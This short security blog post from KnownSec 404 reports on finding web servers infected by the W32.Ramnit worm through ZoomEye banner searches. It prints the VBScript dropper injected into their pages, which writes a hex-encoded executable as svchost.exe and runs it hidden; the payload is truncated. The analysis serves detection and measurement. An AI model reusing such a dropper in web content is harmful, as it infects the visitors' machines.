Looking for W32.Ramnit by using ZoomEye

2 min readJun 5, 2019


by Heige(a.k.a Superhei) of KnownSec 404 Team 06/05/2019

@censysio mentioned a very strange banner data in their tweet today https://twitter.com/censysio/status/1136008471424323584 . A generic VBScript code is embedded in a large number of http server banner data (html body),The VBScript code appears to be overridden to override svchost.exe and VBScirpt code is forcibly inserted at the end of the html body data. This is a typical malicious program behavior.

<div id=”header”><h1>Server Error</h1></div>
<div id=”content”>
<div class=”content-container”><fieldset>
<h2>403 — Forbidden: Access is denied.</h2>
<h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>
<SCRIPT Language=VBScript><! —
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000000000004000…..”
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
// →</SCRIPT>

This behavior is consistent with the characteristics of the W32.Ramnit worm: https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf From the analysis report of symantec, this worm started in 2010.

Sadly, so far you can find a lot of servers that have been attacked. We searched for keywords by ZoomEye: “DropFileName = \”svchost.exe\””, we can find 18,573 results. https://www.zoomeye.org/searchResult?q=%22DropFileName%20%3D%20%5C%22svchost.exe%5C%22%22

Of course, svchost.exe is probably not reliable, there may be other worm variants, we change keywords: “DropFileName” +VBScript and get 18,609 results in ZoomEye :https://www.zoomeye.org/searchResult?q=%22DropFileName%22%20%2BVBScript%20

TOP10 country

Through the “-” operator, you can be sure that you have found a small amount of malicious code for the vsexplore.exe operation, and some targets where the banner data is truncated : https://www.zoomeye.org/searchResult?q=%22DropFileName%22%20%2BVBScript%20-svchost.exe

If you have any questions about ZoomEye, please contact me:https://twitter.com/80vul